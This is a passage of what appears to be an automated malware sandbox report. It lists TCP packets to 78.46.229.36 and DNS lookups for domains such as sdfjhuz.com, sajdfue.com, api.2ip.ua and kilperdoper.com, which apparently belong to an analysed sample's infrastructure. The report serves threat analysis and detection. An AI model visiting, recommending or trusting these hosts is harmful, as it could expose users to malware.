                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.076529026 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.162159920 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.162179947 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.162262917 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.162276983 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.162317038 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.283284903 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.283303022 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.283382893 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.283394098 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.283433914 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367258072 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367289066 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367391109 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367391109 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367400885 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.367501974 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424829006 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424865961 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424912930 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424922943 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424957991 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424966097 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.424997091 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.427721977 CET49782443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:07.427738905 CET4434978278.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.382045031 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.382081032 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.382162094 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.383335114 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.383346081 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.763451099 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.763514996 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764269114 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764276981 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764463902 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764470100 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764489889 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:09.764497995 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.399172068 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.399240971 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.399250031 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.399296999 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.400113106 CET49783443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.400130033 CET4434978378.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.829866886 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.829914093 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.829991102 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.830741882 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:10.830754995 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.211275101 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.218998909 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.222708941 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.222724915 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.222986937 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.222991943 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.920630932 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.920703888 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.922008991 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.922322035 CET49784443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.922338963 CET4434978478.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.924299002 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.924335003 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.924474955 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.924638987 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:11.924649954 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.304428101 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.304505110 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.305248022 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.305257082 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.305486917 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:12.305490971 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.003700018 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.003773928 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.003797054 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.003808975 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.003869057 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.004085064 CET49785443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.004100084 CET4434978578.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.057615042 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.057658911 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.057719946 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.057961941 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.057976961 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.438936949 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.440283060 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.440866947 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.440876961 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.441056013 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:13.441061020 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119554043 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119633913 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119663000 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119757891 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119849920 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119894028 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119915009 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.119960070 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.120620012 CET49786443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:14.120635033 CET4434978678.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.156407118 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.156455040 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.156533003 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.156800032 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.156810045 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.536636114 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.536704063 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537174940 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537178993 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537350893 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537354946 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537409067 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537419081 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537573099 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537587881 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537692070 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537751913 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537847042 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537863970 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537873983 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537882090 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537913084 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:15.537920952 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.817747116 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.817826986 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.817915916 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.818110943 CET49787443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.818125010 CET4434978778.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.866194010 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.866249084 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.866321087 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.866880894 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:16.866893053 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.247824907 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.249599934 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.250040054 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.250047922 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.250226974 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.250232935 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948014021 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948081970 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948092937 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948142052 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948287010 CET49788443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.948312044 CET4434978878.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.949640036 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.949671984 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.949754000 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.950015068 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:17.950026989 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.329610109 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.329716921 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.330147982 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.330159903 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.330313921 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:18.330318928 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:19.045104027 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:19.045172930 CET4434978978.46.229.36192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:19.045254946 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:19.045416117 CET49789443192.168.2.678.46.229.36
                                                                                                                                                                                                                                      Mar 28, 2024 17:52:19.045432091 CET4434978978.46.229.36192.168.2.6

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:11.851926088 CET5758053192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.238831043 CET53575801.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.313994884 CET5826953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:17.309809923 CET5826953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:18.325505018 CET5826953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.344821930 CET5826953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET53582691.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET53582691.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.355015993 CET53582691.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.440078974 CET53582691.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.344551086 CET5784753192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.510754108 CET53578471.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:07.527403116 CET6274253192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.525578976 CET6274253192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:09.513149977 CET6274253192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.528924942 CET6274253192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.601604939 CET53627421.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.601625919 CET53627421.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.601764917 CET53627421.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.624044895 CET53627421.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.690088987 CET5081853192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:14.837574005 CET53508181.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.122769117 CET5081853192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.217783928 CET53508181.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.787622929 CET5774553192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.888930082 CET53577451.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:23.202589989 CET6516453192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:23.388495922 CET53651641.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.022221088 CET5367953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.119347095 CET53536791.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.184413910 CET6285453192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.287796974 CET53628541.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.911917925 CET5053253192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:28.071773052 CET53505321.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.834486008 CET6006953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.929691076 CET53600691.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:37.720863104 CET5252953192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:37.815993071 CET53525291.1.1.1192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.768758059 CET5843453192.168.2.61.1.1.1

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:11.851926088 CET192.168.2.61.1.1.10x2b26Standard query (0)trad-einmyus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:16.313994884 CET192.168.2.61.1.1.10xdfaaStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:17.309809923 CET192.168.2.61.1.1.10xdfaaStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:18.325505018 CET192.168.2.61.1.1.10xdfaaStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.344821930 CET192.168.2.61.1.1.10xdfaaStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.344551086 CET192.168.2.61.1.1.10xd082Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:07.527403116 CET192.168.2.61.1.1.10xac71Standard query (0)sajdfue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.525578976 CET192.168.2.61.1.1.10xac71Standard query (0)sajdfue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:09.513149977 CET192.168.2.61.1.1.10xac71Standard query (0)sajdfue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.528924942 CET192.168.2.61.1.1.10xac71Standard query (0)sajdfue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:13.690088987 CET192.168.2.61.1.1.10x58f6Standard query (0)m2reg.ulm.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.122769117 CET192.168.2.61.1.1.10x58f6Standard query (0)m2reg.ulm.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.787622929 CET192.168.2.61.1.1.10x12c4Standard query (0)resergvearyinitiani.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:23.202589989 CET192.168.2.61.1.1.10x67daStandard query (0)nessotechbd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:25.022221088 CET192.168.2.61.1.1.10x9936Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.184413910 CET192.168.2.61.1.1.10x7974Standard query (0)jennyilis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:27.911917925 CET192.168.2.61.1.1.10xaf47Standard query (0)kilperdoper.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:30.834486008 CET192.168.2.61.1.1.10x9f3fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:37.720863104 CET192.168.2.61.1.1.10x34c1Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:39.768758059 CET192.168.2.61.1.1.10x2e03Standard query (0)api.msn.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:12.238831043 CET1.1.1.1192.168.2.60x2b26No error (0)trad-einmyus.com81.94.159.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com189.232.22.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com201.191.99.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com187.204.78.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com186.145.236.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com196.22.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com78.89.158.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354825974 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com181.128.130.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com189.232.22.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com201.191.99.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com217.219.131.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com187.204.78.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com186.145.236.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com196.22.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com78.89.158.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.354844093 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com181.128.130.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.355015993 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com189.232.22.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:20.355015993 CET1.1.1.1192.168.2.60xdfaaNo error (0)sdfjhuz.com201.191.99.134A (IP address)IN (0x0001)false
